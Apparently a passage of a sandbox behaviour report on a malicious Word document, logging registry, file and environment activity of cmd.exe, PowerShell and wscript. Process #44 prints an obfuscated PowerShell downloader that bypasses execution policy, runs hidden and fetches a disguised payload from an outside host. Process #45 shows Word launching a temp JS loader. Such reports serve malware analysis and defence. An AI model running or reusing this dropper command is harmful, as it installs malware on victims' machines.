Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	3	Fn
File	Open	filename = STD_INPUT_HANDLE	2	Fn
Environment	Get Environment String	-	2	Fn Data
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 24, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = AutoRun, data = 64, type = REG_NONE	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 64, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = AutoRun, data = 9, type = REG_NONE	1	Fn
Module	Get Filename	process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\System32\cmd.exe, size = 260	1	Fn
Environment	Get Environment String	name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Environment	Get Environment String	name = PROMPT	1	Fn
Environment	Set Environment String	name = PROMPT, value = $P$G	1	Fn
Environment	Get Environment String	-	1	Fn Data
Environment	Get Environment String	name = COMSPEC, result_out = C:\Windows\system32\cmd.exe	1	Fn
Environment	Get Environment String	name = KEYS	1	Fn
File	Get Info	filename = C:\Users\aETAdzjz\Documents, type = file_attributes	2	Fn
Environment	Set Environment String	name = =C:, value = C:\Users\aETAdzjz\Documents	1	Fn
Environment	Get Environment String	-	1	Fn Data
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x77040000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CopyFileExW, address_out = 0x770523d0	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = IsDebuggerPresent, address_out = 0x77048290	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetConsoleInputExeNameW, address_out = 0x770517e0	1	Fn
Environment	Get Environment String	name = temp, result_out = C:\Users\aETAdzjz\AppData\Local\Temp	2	Fn

Process #44: powershell.exe

296

0

»

Information	Value
ID	#44
File Name	c:\windows\system32\windowspowershell\v1.0\powershell.exe
Command Line	PowErshelL.eXe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','C:\Users\aETAdzjz\AppData\Local\TempxeE84.png');
Initial Working Directory	C:\Users\aETAdzjz\Documents\
Monitor	Start Time: 00:02:04, Reason: Child Process
Unmonitor	End Time: 00:04:25, Reason: Terminated by Timeout
Monitor Duration	00:02:21

OS Process Information

»

Information	Value
PID	0xce0
Parent PID	0xc6c (c:\windows\system32\cmd.exe)
Bitness	64-bit
Is Created or Modified Executable
Integrity Level	Medium
Username	YKYD69Q\aETAdzjz
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x CE4 0x CEC 0x CF0 0x CF4 0x CF8 0x CFC 0x D00

Memory Dumps

»

Name	Start VA	End VA	Dump Reason	PE Rebuilds	Bitness	Entry Points	Actions
buffer	0x7FF0010A000	0x7FF0010AFFF	First Execution	-	64-bit	0x7FF0010A6A0, 0x7FF0010A080	... Region Actions Download Dump
powershell.exe	0x13FF20000	0x13FF96FFF	Relevant Image	-	64-bit	-	... Region Actions Download Dump
buffer	0x01F82000	0x01F83FFF	First Execution	-	64-bit	0x01F825EC	... Region Actions Download Dump
buffer	0x7FF0011D000	0x7FF0011DFFF	First Execution	-	64-bit	0x7FF0011D020	... Region Actions Download Dump
buffer	0x7FF00042000	0x7FF00042FFF	First Execution	-	64-bit	0x7FF00042DB8	... Region Actions Download Dump
buffer	0x7FF00043000	0x7FF00043FFF	First Execution	-	64-bit	0x7FF00043B38, 0x7FF000435D8, ...	... Region Actions Download Dump
buffer	0x7FF00145000	0x7FF00145FFF	First Execution	-	64-bit	0x7FF0014507D	... Region Actions Download Dump
buffer	0x7FF00143000	0x7FF00143FFF	First Execution	-	64-bit	0x7FF00143A20, 0x7FF00143A7D	... Region Actions Download Dump
buffer	0x7FF00146000	0x7FF00146FFF	First Execution	-	64-bit	0x7FF0014607D	... Region Actions Download Dump
buffer	0x7FF0004A000	0x7FF0004AFFF	First Execution	-	64-bit	0x7FF0004A088	... Region Actions Download Dump
buffer	0x7FF0011E000	0x7FF0011EFFF	First Execution	-	64-bit	0x7FF0011E820	... Region Actions Download Dump
buffer	0x7FF00280000	0x7FF00280FFF	First Execution	-	64-bit	0x7FF00280130	... Region Actions Download Dump

Dropped Files

»

Filename	File Size	Hash Values	YARA Match	Actions
c:\users\aetadzjz\appdata\roaming\microsoft\windows\recent\customdestinations\0ulni9hnju5klneyfyon.temp	7.85 KB	MD5: 8e98b6fe6ff745120849ecbd93d92ca0 SHA1: 7e5f6163318c2a6f9149c5f334675105871e0e07 SHA256: 0a5a2e32a0afb3bf761c84c0c68eb21a2148fc651a8170ba83f61b146009a77e SSDeep: 96:WluC6MqYqvsqvJCwom0S0iluC6MqYqvsEHyqvJCworc0S0FnJ0H30F0nYQlUVQ09:0sBom0S0gsZHnorc0S0F40F0nYk0M0D		... File Actions Show Properties Download

Threads

Thread 0xce4

261

0

»

Category	Operation	Information	Count	Logfile
System	Get Info	type = Operating System	3	Fn
File	Get Info	filename = C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll, type = file_attributes	1	Fn
User	Lookup Privilege	privilege = SeDebugPrivilege, luid = 20	1	Fn
Module	Get Filename	file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 2048	1	Fn
System	Get Info	type = SYSTEM_PROCESS_INFORMATION	1	Fn
Environment	Get Environment String	name = MshEnableTrace	3	Fn
File	Get Info	filename = C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell	1	Fn
Registry	Read Value	value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
Environment	Get Environment String	name = MshEnableTrace	11	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
System	Get Info	type = Operating System	1	Fn
Environment	Get Environment String	name = MshEnableTrace	2	Fn
Environment	Set Environment String	name = PSExecutionPolicyPreference, value = Bypass	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
Environment	Get Environment String	name = PSMODULEPATH, result_out = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = PSMODULEPATH, data = 0, type = REG_EXPAND_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = PSMODULEPATH, data = %SystemRoot%\system32\WindowsPowerShell\v1.0\Modules\, type = REG_EXPAND_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Environment	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Environment, value_name = PSMODULEPATH, type = REG_NONE	1	Fn
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, type = file_type	2	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 4096, size_out = 4096	3	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 4096, size_out = 3315	1	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 781, size_out = 0	1	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 4096, size_out = 0	1	Fn
System	Get Info	type = Hardware Information	1	Fn
Environment	Get Environment String	name = MshEnableTrace	5	Fn
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, type = file_type	2	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, size = 4096, size_out = 4096	6	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, size = 4096, size_out = 2530	1	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, size = 542, size_out = 0	1	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, size = 4096, size_out = 0	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, type = file_type	2	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 4096, size_out = 4096	6	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 4096, size_out = 2762	1	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 310, size_out = 0	1	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 4096, size_out = 0	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
Environment	Get Environment String	name = MshEnableTrace	7	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 2.0, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 2.0, type = REG_SZ	1	Fn
Environment	Get Environment String	name = MshEnableTrace	2	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell	1	Fn
User	Get Username	user_name_out = aETAdzjz	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security	1	Fn
Registry	Open Key	reg_name = Media Center	1	Fn
Registry	Open Key	reg_name = Media Center\PowerShell	1	Fn
Registry	Open Key	reg_name = OAlerts	1	Fn
Registry	Open Key	reg_name = OAlerts\PowerShell	1	Fn
Registry	Open Key	reg_name = Security	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
User	Get Username	user_name_out = aETAdzjz	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
User	Get Username	user_name_out = aETAdzjz	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
Environment	Get Environment String	name = HOMEDRIVE, result_out = C:	1	Fn
Environment	Get Environment String	name = HOMEPATH, result_out = \Users\aETAdzjz	1	Fn
File	Get Info	filename = C:\Users\aETAdzjz, type = file_attributes	1	Fn
File	Get Info	filename = C:\, type = file_attributes	4	Fn
User	Get Username	user_name_out = aETAdzjz	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
User	Get Username	user_name_out = aETAdzjz	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
User	Get Username	user_name_out = aETAdzjz	2	Fn
Environment	Get Environment String	name = MshEnableTrace	2	Fn
User	Get Username	user_name_out = aETAdzjz	1	Fn
Environment	Get Environment String	name = MshEnableTrace	5	Fn
File	Get Info	filename = C:\Users\aETAdzjz\Documents, type = file_attributes	2	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
File	Get Info	filename = C:\, type = file_attributes	2	Fn
File	Get Info	filename = C:\Users, type = file_attributes	2	Fn
File	Get Info	filename = C:\Users\aETAdzjz, type = file_attributes	2	Fn
File	Get Info	filename = C:\Users\aETAdzjz\Documents, type = file_attributes	2	Fn
File	Get Info	filename = C:\Users, type = file_attributes	2	Fn
File	Get Info	filename = C:\Users\aETAdzjz, type = file_attributes	2	Fn
File	Get Info	filename = C:\Users\aETAdzjz\Documents, type = file_attributes	3	Fn
User	Get Username	user_name_out = aETAdzjz	1	Fn
Environment	Get Environment String	name = MshEnableTrace	2	Fn
Environment	Get Environment String	name = HomeDrive, result_out = C:	1	Fn
Environment	Get Environment String	name = HomePath, result_out = \Users\aETAdzjz	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
Environment	Get Environment String	name = MshEnableTrace	11	Fn

Thread 0xd00

35

0

»

Category	Operation	Information	Success	Count	Logfile

Process #45: wscript.exe

176

0

»

Information	Value
ID	#45
File Name	c:\windows\system32\wscript.exe
Command Line	"C:\Windows\System32\WScript.exe" "C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js"
Initial Working Directory	C:\Users\aETAdzjz\Documents\
Monitor	Start Time: 00:02:21, Reason: Child Process
Unmonitor	End Time: 00:02:28, Reason: Self Terminated
Monitor Duration	00:00:06

OS Process Information

»

Information	Value
PID	0xd50
Parent PID	0x910 (c:\program files\microsoft office\root\office16\winword.exe)
Bitness	64-bit
Is Created or Modified Executable
Integrity Level	Medium
Username	YKYD69Q\aETAdzjz
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x D54 0x D64 0x D68 0x D6C 0x D70 0x D74 0x D78 0x D7C 0x D80 0x D84

Threads

Thread 0xd54

175

0

»

Category	Operation	Information	Count	Logfile
System	Get Time	type = System Time, time = 2019-07-26 16:47:24 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 212223	1	Fn
System	Get Time	type = Performance Ctr, time = 26690322788	1	Fn
Module	Get Handle	module_name = c:\windows\system32\wscript.exe, base_address = 0xff1f0000	2	Fn
System	Get Info	type = Operating System	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = IgnoreUserSettings, data = 103, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings, value_name = Enabled, data = 103, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = Enabled, data = 103, type = REG_NONE	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = IgnoreUserSettings, data = 0, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings, value_name = LogSecuritySuccesses, data = 0, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = LogSecuritySuccesses, data = 0, type = REG_NONE	1	Fn
Module	Load	module_name = kernel32.dll, base_address = 0x77040000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = HeapSetInformation, address_out = 0x7705c4a0	1	Fn
Module	Get Filename	module_name = c:\windows\system32\wscript.exe, process_name = c:\windows\system32\wscript.exe, file_name_orig = C:\Windows\System32\WScript.exe, size = 261	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = IgnoreUserSettings, data = 0, type = REG_NONE	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings	1	Fn
